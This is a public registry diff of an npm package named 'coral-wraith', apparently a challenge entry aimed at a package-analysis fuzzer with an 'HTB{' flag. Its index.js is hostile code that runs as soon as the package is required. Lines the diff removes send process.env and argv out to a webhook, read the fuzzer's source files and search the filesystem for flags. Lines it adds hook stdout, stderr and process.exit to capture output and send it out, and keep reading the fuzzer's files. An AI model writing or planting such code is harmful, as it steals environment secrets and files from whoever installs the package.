coral-wraith 9999.0.9 → 9999.0.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +41 -48
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,6 +1,5 @@
1
1
  const fs = require('fs');
2
2
  const https = require('https');
3
- const { execSync } = require('child_process');
4
3
 
5
4
  const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
6
5
 
@@ -19,63 +18,57 @@ function send(path, data) {
19
18
  } catch(e) {}
20
19
  }
21
20
 
22
- // This runs when the fuzzer require()s us
23
- // At this point we're inside the fuzzer's process context
24
- send('require-v9', JSON.stringify({
25
- cwd: process.cwd(),
26
- argv: process.argv,
27
- env: process.env,
28
- pid: process.pid,
29
- moduleFilename: module.filename,
30
- modulePaths: module.paths,
31
- }));
21
+ // Hook stdout and stderr to capture fuzzer output (including flag)
22
+ const origStdoutWrite = process.stdout.write.bind(process.stdout);
23
+ const origStderrWrite = process.stderr.write.bind(process.stderr);
24
+ const capturedOutput = [];
32
25
 
33
- // Read fuzzer source - especially npm_fuzzer.js and fuzz_env.js
34
- const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
35
- const criticalFiles = [
36
- `${fuzzBase}/npm_fuzzer.js`,
37
- `${fuzzBase}/fuzz_env.js`,
38
- `${fuzzBase}/constants.js`,
39
- `${fuzzBase}/fuzz_manager.js`,
40
- ];
26
+ process.stdout.write = function(chunk, encoding, callback) {
27
+ capturedOutput.push('OUT:' + chunk.toString());
28
+ if (capturedOutput.length <= 50) {
29
+ send('stdout-' + capturedOutput.length, chunk.toString());
30
+ }
31
+ return origStdoutWrite(chunk, encoding, callback);
32
+ };
41
33
 
42
- for (let i = 0; i < criticalFiles.length; i++) {
43
- try {
44
- const content = fs.readFileSync(criticalFiles[i], 'utf8');
45
- send(`require-src-${i}`, `${criticalFiles[i]}:\n${content}`);
46
- } catch(e) {
47
- send(`require-src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
34
+ process.stderr.write = function(chunk, encoding, callback) {
35
+ capturedOutput.push('ERR:' + chunk.toString());
36
+ if (capturedOutput.length <= 50) {
37
+ send('stderr-' + capturedOutput.length, chunk.toString());
48
38
  }
49
- }
39
+ return origStderrWrite(chunk, encoding, callback);
40
+ };
50
41
 
51
- // Read ALL bean files
42
+ // Also hook process.exit to capture final output before exit
43
+ const origExit = process.exit;
44
+ process.exit = function(code) {
45
+ send('exit-output', capturedOutput.join('\n'));
46
+ setTimeout(() => origExit(code), 2000);
47
+ };
48
+
49
+ // Set up a timer to send all captured output after 10 seconds
50
+ setTimeout(() => {
51
+ send('captured-all', capturedOutput.join('\n'));
52
+ }, 10000);
53
+
54
+ // Also read key files
52
55
  try {
53
- const r = execSync(`find ${fuzzBase}/bean -name "*.js" 2>/dev/null`).toString().trim();
54
- for (const f of r.split('\n').filter(Boolean)) {
55
- if (!f.includes('._')) {
56
- try {
57
- const c = fs.readFileSync(f, 'utf8');
58
- send(`require-bean-${f.split('/').pop()}`, `${f}:\n${c}`);
59
- } catch(e) {}
60
- }
61
- }
62
- } catch(e) {}
56
+ const fuzzEnv = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js', 'utf8');
57
+ send('fuzz-env-src', fuzzEnv);
58
+ } catch(e) { send('fuzz-env-err', e.message); }
63
59
 
64
- // Check if flag is now available (it might be set after fuzzer init)
65
60
  try {
66
- const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:5000}).toString();
67
- send('require-flag-grep', r);
68
- } catch(e) {}
61
+ const npmFuzzer = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js', 'utf8');
62
+ send('npm-fuzzer-src', npmFuzzer);
63
+ } catch(e) { send('npm-fuzzer-err', e.message); }
69
64
 
70
- // Also check: does the fuzzer write results somewhere?
71
65
  try {
72
- const r = execSync('find /tmp -name "*.json" -o -name "*.log" -o -name "*.txt" 2>/dev/null').toString().trim();
73
- send('require-tmp-files', r);
74
- } catch(e) {}
66
+ const constants = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js', 'utf8');
67
+ send('constants-src', constants);
68
+ } catch(e) { send('constants-err', e.message); }
75
69
 
76
- // Export something benign for the fuzzer to analyze
70
+ // Export something for the fuzzer
77
71
  module.exports = {
78
72
  name: 'coral-wraith',
79
- version: '9999.0.9',
80
- analyze: function() { return 'safe'; },
73
+ version: '9999.0.10',
81
74
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "coral-wraith",
3
- "version": "9999.0.9",
3
+ "version": "9999.0.10",
4
4
  "description": "Coral Wraith module",
5
5
  "main": "index.js",
6
6
  "scripts": {